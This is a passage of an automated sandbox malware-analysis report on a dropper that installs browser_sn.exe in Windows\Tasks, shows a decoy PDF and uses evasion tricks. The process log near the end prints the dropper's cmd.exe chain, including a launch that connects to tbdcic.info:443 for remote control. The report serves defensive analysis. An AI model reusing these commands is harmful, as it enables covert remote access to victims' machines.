,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileStructA,WritePrivateProfileStructA,GetPrivateProfileStructA,WritePrivateProfileStructA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStrin	28_2_00007FF790C381AD
Source: C:\Windows\Tasks\browser_sn.exe	Code function: 28_2_00007FF790C3E1D0 GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,GetLastError,_itow,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileStructA,WritePrivateProfileStructA,GetPrivateProfileStructA,WritePrivateProfileStructA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivat	28_2_00007FF790C3E1D0
Source: C:\Windows\Tasks\browser_sn.exe	Code function: 28_2_00007FF790C89A40 GetPrivateProfileIntA,RegOpenKeyExA,RegQueryValueExA,RegCloseKey,GetPrivateProfileIntA,	28_2_00007FF790C89A40
Source: C:\Windows\Tasks\browser_sn.exe	Code function: 28_2_00007FF790C87BD0 GetPrivateProfileIntA,	28_2_00007FF790C87BD0
Source: C:\Windows\Tasks\browser_sn.exe	Code function: 28_2_00007FF790C87C90 GetPrivateProfileIntA,	28_2_00007FF790C87C90
Source: C:\Windows\Tasks\browser_sn.exe	Code function: 28_2_00007FF790C87E10 GetPrivateProfileIntA,	28_2_00007FF790C87E10
Source: C:\Windows\Tasks\browser_sn.exe	Code function: 28_2_00007FF790C87D50 GetPrivateProfileIntA,	28_2_00007FF790C87D50
Source: C:\Windows\Tasks\browser_sn.exe	Code function: 28_2_00007FF790C87EB0 GetPrivateProfileIntA,	28_2_00007FF790C87EB0
Source: C:\Windows\Tasks\browser_sn.exe	Code function: 28_2_00007FF790C87650 GetPrivateProfileIntA,RegCreateKeyExA,RegCreateKeyExA,	28_2_00007FF790C87650
Source: C:\Windows\Tasks\browser_sn.exe	Code function: 28_2_00007FF790C877F0 GetPrivateProfileIntA,RegQueryValueExA,GetPrivateProfileIntA,	28_2_00007FF790C877F0
Source: C:\Windows\Tasks\browser_sn.exe	Code function: 28_2_00007FF790C87750 GetPrivateProfileIntA,RegCloseKey,RegCloseKey,RegCloseKey,	28_2_00007FF790C87750
Source: C:\Windows\Tasks\browser_sn.exe	Code function: 28_2_00007FF790C87F50 GetPrivateProfileIntA,	28_2_00007FF790C87F50
Source: C:\Windows\Tasks\browser_sn.exe	Code function: 28_2_00007FF790C878E0 GetPrivateProfileIntA,RegQueryValueExA,RegQueryValueExA,GetPrivateProfileStringA,	28_2_00007FF790C878E0

Source: C:\Windows\SysWOW64\cmd.exe

File created: C:\Windows\Tasks\3889122.Khe9oLY

Jump to behavior

Hooking and other Techniques for Hiding and Protection

Icon mismatch, binary includes an icon from a different legit application in order to fool users

Source: initial sample

Icon embedded in binary file: icon matches a legit application icon: download (98).png

Source: C:\Windows\Tasks\browser_sn.exe	Code function: 24_2_00007FF790C648B0 IsIconic,IsWindowVisible,GetWindowRect,SHAppBarMessage,		24_2_00007FF790C648B0
Source: C:\Windows\Tasks\browser_sn.exe	Code function: 28_2_00007FF790C648B0 IsIconic,IsWindowVisible,GetWindowRect,SHAppBarMessage,		28_2_00007FF790C648B0

Source: C:\Windows\Tasks\browser_sn.exe

Code function: 24_2_00007FF790C35A60 LoadLibraryA,GetModuleFileNameA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,DeleteFileA,

24_2_00007FF790C35A60

Source: C:\Users\user\Desktop\T8xrZb7nBL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Tasks\browser_sn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Tasks\browser_sn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Tasks\browser_sn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Tasks\browser_sn.exe	Process information set: NOOPENFILEERRORBOX

Source: C:\Windows\Tasks\browser_sn.exe

24_2_00007FF790C99BC0

Source: C:\Windows\Tasks\browser_sn.exe	Code function: OpenSCManagerA,EnumServicesStatusA,GetLastError,EnumServicesStatusA,OpenServiceA,QueryServiceConfigA,GetLastError,QueryServiceConfigA,CloseServiceHandle,CloseServiceHandle,		24_2_00007FF790C39D00
Source: C:\Windows\Tasks\browser_sn.exe	Code function: OpenSCManagerA,EnumServicesStatusA,GetLastError,EnumServicesStatusA,OpenServiceA,QueryServiceConfigA,GetLastError,QueryServiceConfigA,CloseServiceHandle,CloseServiceHandle,		28_2_00007FF790C39D00

Source: C:\Windows\System32\conhost.exe	Window / User API: threadDelayed 507	Jump to behavior
Source: C:\Windows\Tasks\browser_sn.exe	Window / User API: threadDelayed 682
Source: C:\Windows\SysWOW64\timeout.exe	Window / User API: threadDelayed 1495

Source: C:\Windows\Tasks\browser_sn.exe

Decision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)

graph_24-22876

Source: C:\Users\user\Desktop\T8xrZb7nBL.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\uqVb3.kkb9h	Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	Dropped PE file which has not been started: C:\Windows\Tasks\uqVb3.kkb9h	Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	Dropped PE file which has not been started: C:\Windows\Tasks\conhost.exe	Jump to dropped file

Source: C:\Windows\Tasks\browser_sn.exe

Check user administrative privileges: GetTokenInformation,DecisionNodes

graph_24-22604

Source: C:\Windows\Tasks\browser_sn.exe	API coverage: 3.5 %
Source: C:\Windows\Tasks\browser_sn.exe	API coverage: 1.2 %

Source: C:\Windows\SysWOW64\timeout.exe TID: 8348	Thread sleep count: 64 > 30
Source: C:\Windows\SysWOW64\timeout.exe TID: 8788	Thread sleep count: 34 > 30
Source: C:\Windows\Tasks\browser_sn.exe TID: 9060	Thread sleep time: -68200s >= -30000s
Source: C:\Windows\SysWOW64\timeout.exe TID: 8964	Thread sleep count: 64 > 30
Source: C:\Windows\SysWOW64\timeout.exe TID: 9036	Thread sleep count: 32 > 30
Source: C:\Windows\SysWOW64\timeout.exe TID: 9068	Thread sleep count: 1495 > 30
Source: C:\Windows\SysWOW64\timeout.exe TID: 9068	Thread sleep time: -149500s >= -30000s

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\Tasks\browser_sn.exe	Last function: Thread delayed
Source: C:\Windows\Tasks\browser_sn.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\timeout.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\timeout.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\T8xrZb7nBL.exe	Code function: 0_2_00403387 GetFileAttributesW,SetLastError,FindFirstFileW,FindClose,CompareFileTime,	0_2_00403387
Source: C:\Users\user\Desktop\T8xrZb7nBL.exe	Code function: 0_2_00402EE6 FindFirstFileW,SetFileAttributesW,lstrcmpW,lstrcmpW,SetFileAttributesW,DeleteFileW,FindNextFileW,FindClose,SetFileAttributesW,RemoveDirectoryW,??3@YAXPAX@Z,??3@YAXPAX@Z,	0_2_00402EE6
Source: C:\Windows\Tasks\browser_sn.exe	Code function: 24_2_00007FF790C5C210 SetErrorMode,FindFirstFileA,SetErrorMode,FindClose,	24_2_00007FF790C5C210
Source: C:\Windows\Tasks\browser_sn.exe	Code function: 24_2_00007FF790CEA228 __doserrno,_errno,_invalid_parameter_noinfo,_errno,__doserrno,_getdrive,FindFirstFileExA,_errno,_errno,_errno,_errno,_errno,GetDriveTypeA,free,free,_errno,__doserrno,_wsopen_s,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FindClose,GetLastError,FindClose,	24_2_00007FF790CEA228
Source: C:\Windows\Tasks\browser_sn.exe	Code function: 24_2_00007FF790C56DD1 OpenInputDesktop,CloseDesktop,GetTickCount,GetLogicalDriveStringsA,GetDriveTypeA,SHGetMalloc,SHGetSpecialFolderLocation,SHGetPathFromIDListA,SetErrorMode,FindFirstFileA,SetErrorMode,lstrlenA,FindNextFileA,FindClose,LeaveCriticalSection,	24_2_00007FF790C56DD1
Source: C:\Windows\Tasks\browser_sn.exe	Code function: 24_2_00007FF790C35910 GetModuleFileNameA,FindFirstFileA,SendMessageA,FindNextFileA,FindClose,	24_2_00007FF790C35910
Source: C:\Windows\Tasks\browser_sn.exe	Code function: 28_2_00007FF790C5C210 SetErrorMode,FindFirstFileA,SetErrorMode,FindClose,	28_2_00007FF790C5C210
Source: C:\Windows\Tasks\browser_sn.exe	Code function: 28_2_00007FF790CEA228 __doserrno,_errno,_invalid_parameter_noinfo,_errno,__doserrno,_getdrive,FindFirstFileExA,_errno,_errno,_errno,_errno,_errno,GetDriveTypeA,free,free,_errno,__doserrno,_wsopen_s,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FindClose,GetLastError,FindClose,	28_2_00007FF790CEA228
Source: C:\Windows\Tasks\browser_sn.exe	Code function: 28_2_00007FF790C56DD1 OpenInputDesktop,CloseDesktop,GetTickCount,GetLogicalDriveStringsA,GetDriveTypeA,SHGetMalloc,SHGetSpecialFolderLocation,SHGetPathFromIDListA,SetErrorMode,FindFirstFileA,SetErrorMode,lstrlenA,FindNextFileA,FindClose,LeaveCriticalSection,	28_2_00007FF790C56DD1
Source: C:\Windows\Tasks\browser_sn.exe	Code function: 28_2_00007FF790C35910 GetModuleFileNameA,FindFirstFileA,SendMessageA,FindNextFileA,FindClose,	28_2_00007FF790C35910

Source: C:\Windows\Tasks\browser_sn.exe

24_2_00007FF790C56DD1

Source: C:\Windows\Tasks\browser_sn.exe

Code function: 24_2_00007FF790C49260 GetVersionExA,GetVersionExA,GetModuleHandleA,GetProcAddress,GetSystemInfo,

24_2_00007FF790C49260

Source: browser_sn.exe, 00000018.00000002.1545831120.0000000002796000.00000004.00000020.00020000.00000000.sdmp, browser_sn.exe, 0000001C.00000002.1479984640.0000000002BC5000.00000004.00000020.00020000.00000000.sdmp, browser_sn.exe, 00000025.00000002.1647077751.0000000002596000.00000004.00000020.00020000.00000000.sdmp, browser_sn.exe, 00000025.00000002.1646990138.00000000023D5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V Remote Desktop Virtualization Service
Source: browser_sn.exe, 00000023.00000002.2540248837.0000000002866000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -pSsT AUTHOTY\LocLocalSystemHyper-V Data Exchange Service
Source: browser_sn.exe, 00000025.00000002.1646704847.000000000090B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWors
Source: browser_sn.exe, 0000001C.00000002.1479984640.0000000002BC5000.00000004.00000020.00020000.00000000.sdmp, browser_sn.exe, 00000025.00000002.1646990138.00000000023D5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V Volume Shadow Copy Requestor
Source: browser_sn.exe, 0000001C.00000002.1479984640.0000000002BC5000.00000004.00000020.00020000.00000000.sdmp, browser_sn.exe, 00000025.00000002.1646990138.00000000023D5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V Time Synchronization Service
Source: browser_sn.exe, 0000001C.00000002.1480044790.0000000002DA6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -pLocalSystemHyper-V Data Exchange Service
Source: browser_sn.exe, 0000001C.00000002.1480044790.0000000002DA6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -pLocalSystemHyper-V Guest Service Interface{3
Source: browser_sn.exe, 0000001C.00000002.1479984640.0000000002BC5000.00000004.00000020.00020000.00000000.sdmp, browser_sn.exe, 00000025.00000002.1646990138.00000000023D5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V Heartbeat Service
Source: browser_sn.exe, 00000018.00000002.1545831120.0000000002796000.00000004.00000020.00020000.00000000.sdmp, browser_sn.exe, 00000025.00000002.1647077751.0000000002596000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -pLocalSystemHyper-V PowerShell Direct Service
Source: browser_sn.exe, 00000025.00000002.1647077751.0000000002596000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: C:\Windows\system32\svchost.exe -k ICService -pworkResicted LocalSystemHyper-V Remote Desktop Virtualization ServiceInterface
Source: browser_sn.exe, 00000018.00000002.1545831120.0000000002796000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -pLocalSystemHyper-V Guest Service Interface
Source: browser_sn.exe, 00000018.00000002.1545470757.0000000000B2B000.00000004.00000020.00020000.00000000.sdmp, browser_sn.exe, 0000001C.00000002.1479835902.000000000106A000.00000004.00000020.00020000.00000000.sdmp, browser_sn.exe, 00000023.00000002.2539905996.0000000000BBB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: browser_sn.exe, 0000001C.00000002.1479984640.0000000002BC5000.00000004.00000020.00020000.00000000.sdmp, browser_sn.exe, 00000025.00000002.1646990138.00000000023D5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V Guest Shutdown Service
Source: browser_sn.exe, 00000025.00000002.1647077751.0000000002596000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -pnWorktationLocalSystemHyper-V Data Exchange Service
Source: browser_sn.exe, 00000025.00000002.1646990138.00000000023D5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: vmicshutdown
Source: browser_sn.exe, 00000018.00000002.1545831120.0000000002796000.00000004.00000020.00020000.00000000.sdmp, browser_sn.exe, 0000001C.00000002.1479984640.0000000002BC5000.00000004.00000020.00020000.00000000.sdmp, browser_sn.exe, 00000025.00000002.1647077751.0000000002596000.00000004.00000020.00020000.00000000.sdmp, browser_sn.exe, 00000025.00000002.1646990138.00000000023D5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V PowerShell Direct Service
Source: browser_sn.exe, 0000001C.00000002.1480044790.0000000002DA6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: C:\Windows\system32\svchost.exe -k ICService -pLocalSystemuthoHyper-V Remote Desktop Virtualization Services
Source: browser_sn.exe, 00000025.00000002.1646990138.00000000023D5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: vmicvss
Source: browser_sn.exe, 00000018.00000002.1545831120.0000000002796000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: C:\Windows\system32\svchost.exe -k ICService -pLocalSystemHyper-V Remote Desktop Virtualization Service5
Source: browser_sn.exe, 0000001C.00000002.1480044790.0000000002DA6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: uthoHyper-V Remote Desktop Virtualization Service
Source: browser_sn.exe, 00000025.00000002.1646704847.000000000090B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllK
Source: browser_sn.exe, 0000001C.00000002.1479984640.0000000002BC5000.00000004.00000020.00020000.00000000.sdmp, browser_sn.exe, 0000001C.00000002.1480044790.0000000002DA6000.00000004.00000020.00020000.00000000.sdmp, browser_sn.exe, 00000023.00000002.2540248837.0000000002866000.00000004.00000020.00020000.00000000.sdmp, browser_sn.exe, 00000025.00000002.1647077751.0000000002596000.00000004.00000020.00020000.00000000.sdmp, browser_sn.exe, 00000025.00000002.1646990138.00000000023D5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V Data Exchange Service
Source: browser_sn.exe, 0000001C.00000002.1480044790.0000000002DA6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \LocHyper-V PowerShell Direct Service
Source: browser_sn.exe, 0000001C.00000002.1480044790.0000000002DA6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -pLocalSystem\LocHyper-V PowerShell Direct Service
Source: browser_sn.exe, 00000023.00000002.2540248837.0000000002866000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -pLocalSystemHyper-V Guest Service InterfaceX
Source: browser_sn.exe, 00000018.00000002.1545831120.0000000002796000.00000004.00000020.00020000.00000000.sdmp, browser_sn.exe, 0000001C.00000002.1479984640.0000000002BC5000.00000004.00000020.00020000.00000000.sdmp, browser_sn.exe, 0000001C.00000002.1480044790.0000000002DA6000.00000004.00000020.00020000.00000000.sdmp, browser_sn.exe, 00000023.00000002.2540248837.0000000002866000.00000004.00000020.00020000.00000000.sdmp, browser_sn.exe, 00000025.00000002.1646990138.00000000023D5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V Guest Service Interface
Source: browser_sn.exe, 00000025.00000002.1646990138.00000000023D5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: vmicheartbeat

Source: C:\Windows\Tasks\browser_sn.exe	API call chain: ExitProcess graph end node			graph_24-22369
Source: C:\Windows\Tasks\browser_sn.exe	API call chain: ExitProcess graph end node

Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\Tasks\browser_sn.exe

Code function: 24_2_00007FF790CE7220 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

24_2_00007FF790CE7220

Source: C:\Windows\Tasks\browser_sn.exe

Code function: 24_2_00007FF790C426B0 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,WTSGetActiveConsoleSessionId,Sleep,GetLastError,sprintf,OutputDebugStringA,Sleep,FreeLibrary,FreeLibrary,

24_2_00007FF790C426B0

Source: C:\Windows\Tasks\browser_sn.exe

24_2_00007FF790C99BC0

Source: C:\Users\user\Desktop\T8xrZb7nBL.exe

Code function: 0_2_0040236F LoadLibraryA,GetProcAddress,GetNativeSystemInfo,

0_2_0040236F

Source: C:\Windows\SysWOW64\taskkill.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe	Process token adjusted: Debug

Source: C:\Windows\Tasks\browser_sn.exe	Code function: 24_2_00007FF790CE7220 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	24_2_00007FF790CE7220
Source: C:\Windows\Tasks\browser_sn.exe	Code function: 24_2_00007FF790CF47E4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	24_2_00007FF790CF47E4
Source: C:\Windows\Tasks\browser_sn.exe	Code function: 28_2_00007FF790CE7220 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	28_2_00007FF790CE7220
Source: C:\Windows\Tasks\browser_sn.exe	Code function: 28_2_00007FF790CF47E4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	28_2_00007FF790CF47E4

Source: C:\Windows\Tasks\browser_sn.exe

Code function: LoadLibraryA,GetProcAddress,GetProcAddress,GetSystemMetrics,GetCurrentProcessId,CreateToolhelp32Snapshot,Process32First,CloseHandle,FreeLibrary,CloseHandle,FreeLibrary,Process32Next, explorer.exe

28_2_00007FF790C99BC0

Source: C:\Windows\Tasks\browser_sn.exe

Code function: 24_2_00007FF790C43210 GetVersionExA,GetEnvironmentVariableA,GetPrivateProfileStringA,GetPrivateProfileStringA,SetFileAttributesA,WritePrivateProfileStringA,GetLastError,GetEnvironmentVariableA,GetForegroundWindow,ShellExecuteExA,

24_2_00007FF790C43210

Source: C:\Windows\Tasks\browser_sn.exe

Code function: 24_2_00007FF790C474C0 keybd_event,GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetKeyState,TryEnterCriticalSection,LeaveCriticalSection,keybd_event,

24_2_00007FF790C474C0

Source: C:\Windows\Tasks\browser_sn.exe

Code function: 24_2_00007FF790C34390 Sleep,CreateThread,CloseHandle,SendMessageA,FindWindowA,PostMessageA,SendMessageA,mouse_event,Sleep,mouse_event,FindWindowA,PostMessageA,

24_2_00007FF790C34390

Source: C:\Users\user\Desktop\T8xrZb7nBL.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy /y "%CD%\." "%CD%\..\..\..\..\..\..\Windows\Tasks\"	Jump to behavior
Source: C:\Users\user\Desktop\T8xrZb7nBL.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c cd C:\Windows\Tasks\ & copy 9655269573 9655269573.cmd	Jump to behavior
Source: C:\Users\user\Desktop\T8xrZb7nBL.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c cd C:\Windows\Tasks\ & copy 3889122.Khe9oLY 3889122.cmd	Jump to behavior
Source: C:\Users\user\Desktop\T8xrZb7nBL.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c cd C:\Windows\Tasks\ & 9655269573.cmd	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 1	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Downloads\Lom.pdf"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 1	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im browser_sn.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 2	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 1	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 2	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\Tasks\browser_sn.exe C:\Windows\Tasks\browser_sn.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 8	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\Tasks\browser_sn.exe C:\Windows\Tasks\browser_sn.exe -autoreconnect -id:user-PC_Jd0Qd -connect tbdcic.info:443	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 2	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 4	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c "C:\Windows\Tasks\3889122.cmd"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 600	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im browser_sn.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 2
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\Tasks\browser_sn.exe C:\Windows\Tasks\browser_sn.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 8
